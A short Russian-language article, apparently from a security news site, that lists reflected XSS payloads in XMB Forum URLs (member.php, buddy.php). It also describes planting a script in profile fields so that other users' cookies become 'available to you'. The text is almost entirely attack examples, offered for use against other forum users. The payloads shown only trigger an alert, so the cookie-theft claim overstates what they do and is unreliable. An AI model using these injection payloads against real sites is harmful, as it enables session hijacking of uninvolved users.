Примеры уязвимостей в XMB Forum:

http://pathto/XMBforum/member.php? action=viewpro&member= admin<script>alert
('XSS')</script>

и

http://pathto/XMBforum/buddy.php? action=<script>alert('XSS') </script>&buddy=<
script>alert('XSS')</script>

в вашем профайле: всего лишь заполним поля MSN и Current Mood следующим образом: 

<script>alert('XSS') </script>

и когда другие пользователи будут созерцать ваш профайл, их куки будут доступны вам.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии